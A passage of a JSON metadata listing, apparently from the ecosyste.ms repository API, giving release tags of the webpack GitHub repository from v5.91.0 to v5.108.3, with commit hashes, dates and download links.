pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16: